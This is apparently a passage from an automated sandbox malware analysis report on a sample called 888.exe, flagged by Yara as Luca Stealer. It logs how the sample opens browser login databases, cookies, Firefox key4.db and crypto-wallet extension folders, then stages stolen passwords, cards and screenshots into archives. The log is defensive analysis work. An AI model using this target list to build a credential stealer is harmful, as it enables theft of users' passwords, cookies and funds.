              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\screen1.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\screen1.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\sensitive-files.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\sensitive-files.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\user_info.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Wallets VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Passwords\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Passwords\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\CreditCards\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\CreditCards\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\CreditCards\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\CreditCards\Firefox_Firefox.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies\Chrome_Default_Network.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies\Chrome_Default_Network.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies\Edge_Default_Network.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeCode function: 0_2_00D973D3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00D973D3
              Source: C:\Users\user\Desktop\888.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected Luca Stealer
              Source: Yara matchFile source: 888.exe, type: SAMPLE
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 0.2.888.exe.a50000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.888.exe.a50000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.1849050689.000000000131F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 888.exe PID: 7888, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmndedJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklbJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflalJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\admmjipmmciaobhojoghlmleefbicajgJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.default\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkkJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\caljgklbbfbcjjanaijlacgncafpegllJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioamekaJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmidedJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\025af778-db9d-49f0-b172-4eb563717cb5\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafchJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmlJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbbJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmgJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpeiJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login DataJump to behavior
